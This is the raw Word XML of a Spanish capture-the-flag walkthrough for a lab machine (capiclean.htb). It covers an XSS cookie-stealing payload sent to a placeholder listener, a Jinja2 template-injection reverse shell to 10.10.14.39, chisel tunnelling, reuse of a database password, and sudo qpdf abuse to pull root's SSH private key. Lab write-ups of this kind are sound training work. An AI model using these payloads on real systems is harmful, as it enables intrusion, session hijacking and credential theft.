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571750" cy="1447800"/>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717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Iniciar un servidor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3695700" cy="447675"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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6957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Vulnerable a xss </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src=x onerror=fetch('http://&lt;YourIP:Your PORT&gt;/?c='+document.cookie);&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src=x onerror=fetch("http://&lt;your_ip&gt;:port/"+document.cookie);&gt;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r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Encoder el script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2324100"/>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Obtenemos cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="368300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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Agregamos cookie y viajamos a el directorio de dashboard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2743200"/>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1">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti</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Creamos exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash -i &gt;&amp; /dev/tcp/10.10.14.39/6161 0&gt;&amp;1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429125" cy="714375"/>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4291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Habilitamos servidor pa conectarnos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="838200"/>
            <wp:effectExtent b="0" l="0" r="0" t="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Habilitamos puerto de escucha</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="10795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Creamos un exploit donde le decimos que va a entrar a la direccion 10.10.14.39:8001 en el puerto 8001 y va a descargar el exploit creado anteriormente el cual se ejecutará y nos generará un reverse shell en el puerto 6161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4699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 esto obtenemos conexion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="11557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realizamos el siguiente comando para tener una conexión estable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c'import pty;pty.spawn("/bin/bash")’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export TERM=xterm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stty raw -echo;fg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python3 -c'import pty;pty.spawn("/bin/bash")'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Este comando utiliza Python 3 para invocar un shell interactivo de Bash. La biblioteca </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pty</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> se utiliza para interactuar con el pseudo-terminal del sistema, lo que permite una mejor manipulación de la terminal en una sesión interactiva.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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export TERM=xterm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Este comando establece la variable de entorno </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TERM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xterm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TERM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> es una variable de entorno que especifica el tipo de terminal que se está utilizando. Al establecerlo en </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xterm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, se le está indicando al sistema que se comporte como si estuviera utilizando un emulador de terminal Xterm, lo que puede mejorar la compatibilidad y el rendimiento de ciertas aplicaciones de terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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stty raw -echo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Este comando configura el terminal para que esté en modo "raw" y deshabilita la eco de entrada. En el modo "raw", los caracteres de entrada se envían directamente al programa en ejecución sin ningún procesamiento adicional, lo que puede ser útil para aplicaciones que requieren entrada de teclado sin procesar. Deshabilitar la eco de entrada evita que el terminal muestre caracteres mientras se ingresan, lo que puede mejorar la experiencia de usuario en ciertos casos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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fg</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Este comando coloca el trabajo actual en primer plano. En el contexto de la invocación de un shell con </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pty.spawn("/bin/bash")</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, esto coloca el shell Bash en primer plano, lo que te permite interactuar directamente con él y continuar utilizando la sesión de shell de manera normal.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15000" cy="1552575"/>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15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hacemos un curl a nuestra dirección para descargar en la maquina victima chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl 10.10.14.8:8000/chisel_1.9.1_linux_386 -o chisel_1.9.1_linux_386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Chisel es una herramienta que se utiliza para crear túneles TCP a través de conexiones HTTP. Esto significa que puedes utilizar Chisel para establecer una conexión entre dos sistemas que pueden estar detrás de firewalls, NATs u otras restricciones de red. La comunicación entre estos sistemas se realiza a través de HTTP, lo que facilita el traspaso de barreras de red que de otro modo impedirían la comunicación directa.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698500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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ponemos a correr nuestra herramienta en nuestramaquina local con </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./chisel server -p 9001 --reverse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9652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./chisel 10.10.14.8:9001 R:3306:localhost:3306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obtuvimos la conexión </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="20320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731200" cy="584200"/>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después de obtener la contraseña que se encontraba en la base de datos hicimos una conexión sql al usuario: consuela y la password: simple and clean</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="4381500"/>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utilizamos el comando sudo -l para ver cuales son los comando que puede utilizar y encontramos que puede utilizar pdf como usuario root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62230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utilizamos el comando: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sudo qpdf --empty --add-attachment /root/.ssh/id_rsa --mimetype=text/plain -- extract.pdf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sudo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Este comando se utiliza para ejecutar el comando que sigue con privilegios de superusuario. En otras palabras, permite ejecutar el comando </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">qpdf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> con permisos elevados, lo que puede ser necesario para realizar ciertas operaciones que requieren privilegios de administrador.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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qpdf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Este es el comando principal que se está ejecutando. QPDF es una herramienta de línea de comandos que se utiliza para manipular y transformar archivos PDF. En este caso, se está utilizando para realizar una operación específica en un archivo PDF.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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--empty</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Esta opción le dice a QPDF que cree un archivo PDF vacío si no se especifica ningún otro archivo PDF en la línea de comandos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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--add-attachment /root/.ssh/id_rsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Esta opción indica a QPDF que agregue un archivo adjunto al archivo PDF. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/root/.ssh/id_rsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> es la ruta al archivo que se está adjuntando. En este caso, parece que se está adjuntando la clave privada SSH </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_rsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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--mimetype=text/plain</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Esta opción especifica el tipo MIME del archivo adjunto. Aquí se está estableciendo el tipo MIME como </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">text/plain</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, lo que indica que el archivo adjunto es de tipo texto sin formato.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-- extract.pdf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Esta parte del comando especifica el archivo PDF al que se están aplicando las operaciones. En este caso, parece que se está especificando un archivo llamado </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">extract.pdf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, lo que sugiere que se agregarán los archivos adjuntos al archivo PDF llamado </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">extract.pdf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>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t xml:space="preserve">En resumen, este comando utiliza QPDF para agregar un archivo adjunto (en este caso, una clave privada SSH) al archivo PDF </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">extract.pdf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, especificando el tipo MIME del archivo adjunto como texto sin formato. El comando se ejecuta con privilegios de superusuario (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) para realizar estas operaciones</w:t>
      </w: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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="317500"/>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">podemos ver como creo el archivo extract.pdf</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pP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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Así que procedemos a descargar nuestro archivo en nuestra máquina local </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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scp consuela@capiclean.htb:/home/consuela/extract.pdf .</w:t>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5705475" cy="714375"/>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054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esto nos descarga el archivo extract.pdf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ahora lo que procedemos hacer es con nuestra herramienta binwalk extraemos nuestro archivo pd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r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">binwalk -Me extract.pdf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> se utiliza para extraer todos los archivos incrustados que Binwalk pueda encontrar dentro del archivo PDF llamado </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">extract.pdf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Aquí está el desglose:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">binwalk</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Es el comando principal que invoca la herramienta Binwalk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-Me</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Estas son opciones o flags que se pasan a Binwalk para especificar cómo debe realizar la extracción:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-M</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Indica a Binwalk que realice una búsqueda recursiva para encontrar archivos incrustados dentro de otros archivos incrustados. Es útil cuando los archivos incrustados están comprimidos o empaquetados en múltiples capas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Le dice a Binwalk que extraiga todos los archivos incrustados que encuentre. Binwalk extraerá estos archivos y los guardará en un directorio con el mismo nombre que el archivo original (en este caso, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">extract.pdf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) en el directorio actual.</w:t>
      </w:r>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">extract.pdf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Es el archivo PDF que se está analizando y del cual se están extrayendo los archivos incrustados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="3175000"/>
            <wp:effectExtent b="0" l="0" r="0" t="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t xml:space="preserve">Esto nos deja una carpeta a la cual accedemos </w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5581650" cy="1038225"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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5816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t xml:space="preserve">el archivo 220 trae nuestra llave privada</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1701800"/>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t xml:space="preserve">Procedemos a darle permisos</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="977900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">y ya por ultimo procedemos a ser nuestra conexión ssh root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">
      <w:p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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
